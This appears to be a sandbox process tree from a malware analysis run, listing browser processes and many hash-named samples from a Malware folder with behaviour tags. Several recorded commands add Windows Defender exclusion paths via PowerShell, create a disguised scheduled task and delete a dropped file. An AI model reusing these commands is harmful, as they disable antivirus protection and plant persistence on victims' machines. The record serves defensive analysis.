C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:12⤵PID:2788
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:12⤵PID:4568
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3228 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:6220
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4492
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2788
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:4292
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3040 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.0.1429151700\1110989340" -parentBuildID 20221007134813 -prefsHandle 1900 -prefMapHandle 1560 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8944ddb-81d3-4499-853e-25a0b82df6e4} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 1980 2214c2cdb58 gpu3⤵PID:1588
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.1.1009976244\896320198" -parentBuildID 20221007134813 -prefsHandle 2352 -prefMapHandle 2348 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {827ea84d-268d-4e5b-b848-0535740d9022} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 2380 2214c1fb458 socket3⤵PID:2148
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.2.224073702\1542257713" -childID 1 -isForBrowser -prefsHandle 3020 -prefMapHandle 3192 -prefsLen 21077 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f858e773-57ef-4bbb-aff6-5bed4d744d1e} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 3076 221503b5d58 tab3⤵PID:1380
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.3.630205120\1824215223" -childID 2 -isForBrowser -prefsHandle 3548 -prefMapHandle 3544 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f9ebf00-2fd0-4ffd-9d78-3cc8443a8cb2} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 3556 22138562958 tab3⤵PID:832
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.4.1218213472\638907509" -childID 3 -isForBrowser -prefsHandle 3920 -prefMapHandle 3908 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab10151c-9a1c-4098-8a70-4ebb4e93923e} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 3940 22151339058 tab3⤵PID:4532
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.5.322169458\729390225" -childID 4 -isForBrowser -prefsHandle 5088 -prefMapHandle 5072 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {530c735a-1e33-4461-9653-8e97ac3cd500} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 5096 2214c1fd858 tab3⤵PID:4028
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.7.894684683\13946944" -childID 6 -isForBrowser -prefsHandle 5376 -prefMapHandle 5380 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee4b447e-b5f9-467f-bec8-b1318a6c19f0} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 5368 221526c6a58 tab3⤵PID:3316
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.6.1331024438\528437580" -childID 5 -isForBrowser -prefsHandle 5204 -prefMapHandle 5208 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b54c4cd0-7c26-48ef-b3e8-c20fb746ad3d} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 5020 221526c5b58 tab3⤵PID:3204
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.8.1945592806\1623828298" -childID 7 -isForBrowser -prefsHandle 5904 -prefMapHandle 5900 -prefsLen 26577 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d14b284a-5510-4dbb-b593-fc3a7d29115d} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 5912 22152275c58 tab3⤵PID:5976
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.9.1893998173\691777117" -childID 8 -isForBrowser -prefsHandle 4340 -prefMapHandle 4264 -prefsLen 26752 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0bc0e812-94ce-4ed0-a060-4f3b25cb62c2} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 4328 2213856c858 tab3⤵PID:5364
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.10.1468157759\736068484" -parentBuildID 20221007134813 -prefsHandle 2896 -prefMapHandle 3360 -prefsLen 26789 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ec15a82-8a90-4f85-94f8-569a6fa025d3} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 3104 22138562358 rdd3⤵PID:5424
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.11.869044514\892356101" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5056 -prefMapHandle 5096 -prefsLen 27133 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9494bed7-19f2-4634-a555-8321d8a33576} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 6088 2215133ab58 utility3⤵PID:5844
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.12.1494646579\1683127295" -childID 9 -isForBrowser -prefsHandle 9796 -prefMapHandle 9800 -prefsLen 29188 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da656d5b-545c-4894-8597-909a36c49d77} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 9812 2215569d558 tab3⤵PID:5192
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.14.327111130\525016761" -childID 11 -isForBrowser -prefsHandle 5564 -prefMapHandle 5276 -prefsLen 30334 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31dde227-b951-4ca5-b1d4-f41264133012} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 6140 22152276258 tab3⤵PID:6912
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.13.1716335714\875324787" -childID 10 -isForBrowser -prefsHandle 9304 -prefMapHandle 5824 -prefsLen 30334 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {05c3f4bb-2092-4024-9476-03d4b3e15e00} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 5924 22152275658 tab3⤵PID:5320
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.15.555133410\280290712" -childID 12 -isForBrowser -prefsHandle 9880 -prefMapHandle 9884 -prefsLen 30334 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75ab0780-3a48-4b47-b8ec-277c5d45cf41} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 6004 221543c4b58 tab3⤵PID:6976
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.16.191243406\633303831" -childID 13 -isForBrowser -prefsHandle 9784 -prefMapHandle 10216 -prefsLen 30334 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07669d9a-4bfd-418c-badc-0fedc3a83828} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 10228 22154d67558 tab3⤵PID:6188
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.17.253708648\1108237032" -childID 14 -isForBrowser -prefsHandle 6100 -prefMapHandle 5752 -prefsLen 30334 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8276e7c9-be20-4ddc-8305-cf9ab5fa8acb} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 5984 221542bb558 tab3⤵PID:3796
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3040.18.1188494480\326279458" -childID 15 -isForBrowser -prefsHandle 6184 -prefMapHandle 6148 -prefsLen 30334 -prefMapSize 232675 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64f46b17-48e1-4048-8d19-6571bf0022bc} 3040 "\\.\pipe\gecko-crash-server-pipe.3040" 3936 2213852e458 tab3⤵PID:6308
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4160 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb3cb79758,0x7ffb3cb79768,0x7ffb3cb797782⤵PID:332
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:22⤵PID:5860
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2276 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:82⤵PID:5348
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:82⤵PID:1848
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:12⤵PID:1008
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:12⤵PID:5156
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4556 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:12⤵PID:1424
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3700 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:82⤵PID:3032
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4848 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:82⤵PID:5616
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3992 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:82⤵PID:6840
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level2⤵PID:6416
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff76fb67688,0x7ff76fb67698,0x7ff76fb676a83⤵PID:6796
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:82⤵PID:7144
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5060 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:12⤵PID:7164
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3748 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:12⤵PID:2808
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:82⤵PID:5028
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5640 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:12⤵PID:5640
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:82⤵
- Modifies registry class
PID:6892 -
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed079f4562cd9c8.exe"C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed079f4562cd9c8.exe" -u3⤵PID:7372
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5488 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:82⤵PID:4916
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5252 --field-trial-handle=1928,i,8982434941619549826,15230855454563156258,131072 /prefetch:22⤵PID:5756
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:5824
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7052
-
C:\Users\Admin\Desktop\Malware\6b53de90d4c71ace801f6208d6a38c6e59a7e5d50de83544b9ef7f20c5296de2.exe"C:\Users\Admin\Desktop\Malware\6b53de90d4c71ace801f6208d6a38c6e59a7e5d50de83544b9ef7f20c5296de2.exe"1⤵PID:3576
-
C:\Users\Admin\Desktop\Malware\1f2a3d598734fe566de2054f3c73fd2245fc6023f0740bdbae88a076f508ebd2.exe"C:\Users\Admin\Desktop\Malware\1f2a3d598734fe566de2054f3c73fd2245fc6023f0740bdbae88a076f508ebd2.exe"1⤵PID:2956
-
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\setup_install.exe"2⤵PID:1804
-
C:\Users\Admin\Desktop\Malware\2a6e81706ec02af2afc1254ac19dcf89203bc0cefd6d6df5cf57cd9c70526c6c.exe"C:\Users\Admin\Desktop\Malware\2a6e81706ec02af2afc1254ac19dcf89203bc0cefd6d6df5cf57cd9c70526c6c.exe"1⤵PID:6380
-
C:\Users\Admin\Desktop\Malware\2c17c6ecd63459b4442629093178ca786b4754244e1d879cef8520ce3e471d4f.exe"C:\Users\Admin\Desktop\Malware\2c17c6ecd63459b4442629093178ca786b4754244e1d879cef8520ce3e471d4f.exe"1⤵PID:5552
-
C:\Users\Admin\Desktop\Malware\2c17c6ecd63459b4442629093178ca786b4754244e1d879cef8520ce3e471d4f.exe"C:\Users\Admin\Desktop\Malware\2c17c6ecd63459b4442629093178ca786b4754244e1d879cef8520ce3e471d4f.exe"2⤵PID:7844
-
C:\Users\Admin\Desktop\Malware\2bee29bac294615a9d1b613ba775972cda26781938e3ae3aa60ad9737f1fbde8.exe"C:\Users\Admin\Desktop\Malware\2bee29bac294615a9d1b613ba775972cda26781938e3ae3aa60ad9737f1fbde8.exe"1⤵PID:6548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6548 -s 11682⤵
- Program crash
PID:1748
-
C:\Users\Admin\Desktop\Malware\3c5720111b5562bdbcef0ac01a7d4fcf47ad75af43f84220129c0a1abb5e65f4.exe"C:\Users\Admin\Desktop\Malware\3c5720111b5562bdbcef0ac01a7d4fcf47ad75af43f84220129c0a1abb5e65f4.exe"1⤵PID:6392
-
C:\Users\Admin\Desktop\Malware\3c5720111b5562bdbcef0ac01a7d4fcf47ad75af43f84220129c0a1abb5e65f4.exe"C:\Users\Admin\Desktop\Malware\3c5720111b5562bdbcef0ac01a7d4fcf47ad75af43f84220129c0a1abb5e65f4.exe"2⤵PID:4708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 21683⤵
- Program crash
PID:6996
-
C:\Users\Admin\Desktop\Malware\4de3272c8195c4473cfa3c3abaaf682c7975ee0dc02f555fb5ac8588dcf3af26.exe"C:\Users\Admin\Desktop\Malware\4de3272c8195c4473cfa3c3abaaf682c7975ee0dc02f555fb5ac8588dcf3af26.exe"1⤵PID:2340
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ytqvxcAUGHl.exe"2⤵PID:8092
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ytqvxcAUGHl" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5301.tmp"2⤵
- Creates scheduled task(s)
PID:8104 -
C:\Users\Admin\Desktop\Malware\4de3272c8195c4473cfa3c3abaaf682c7975ee0dc02f555fb5ac8588dcf3af26.exe"C:\Users\Admin\Desktop\Malware\4de3272c8195c4473cfa3c3abaaf682c7975ee0dc02f555fb5ac8588dcf3af26.exe"2⤵PID:7308
-
C:\Users\Admin\Desktop\Malware\4de3272c8195c4473cfa3c3abaaf682c7975ee0dc02f555fb5ac8588dcf3af26.exe"C:\Users\Admin\Desktop\Malware\4de3272c8195c4473cfa3c3abaaf682c7975ee0dc02f555fb5ac8588dcf3af26.exe"2⤵PID:6128
-
C:\Users\Admin\Desktop\Malware\5eff7e99184b9c8352125aaf8aa9d72e33049c52dc4eb7a69d509da3e7004cb2.exe"C:\Users\Admin\Desktop\Malware\5eff7e99184b9c8352125aaf8aa9d72e33049c52dc4eb7a69d509da3e7004cb2.exe"1⤵PID:6456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6456 -s 3442⤵
- Program crash
PID:7240
-
C:\Users\Admin\Desktop\Malware\5fca14e334abfa6aefad9d409d44e951f14231ae0a0f91b7af0ce392726be3ad.exe"C:\Users\Admin\Desktop\Malware\5fca14e334abfa6aefad9d409d44e951f14231ae0a0f91b7af0ce392726be3ad.exe"1⤵PID:6816
-
C:\Users\Admin\AppData\Local\Temp\updater.exe"C:\Users\Admin\AppData\Local\Temp\updater.exe"2⤵PID:3184
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"1⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\{4466F413-E06D-4A55-BCE3-A9AEE7533F08}\SRI Java\vmtoolsd.exe"C:\Users\Admin\AppData\Local\Temp\{4466F413-E06D-4A55-BCE3-A9AEE7533F08}\SRI Java\vmtoolsd.exe"1⤵PID:6724
-
C:\Users\Admin\AppData\Roaming\FWPUCLNT\vmtoolsd.exe"C:\Users\Admin\AppData\Roaming\FWPUCLNT\vmtoolsd.exe"2⤵PID:5264
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵PID:6336
-
C:\Users\Admin\AppData\Local\Temp\ComSecure.exeC:\Users\Admin\AppData\Local\Temp\ComSecure.exe4⤵PID:7812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\{6F7A7D15-E684-4853-B17B-6C58D6B9CC03}\_isC2F6.exe"1⤵PID:3404
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"1⤵PID:6560
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"2⤵PID:5028
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed07bdaa18ec852.exe1⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\7zSC8BB7DD0\Wed07bdaa18ec852.exeWed07bdaa18ec852.exe2⤵PID:6732
-
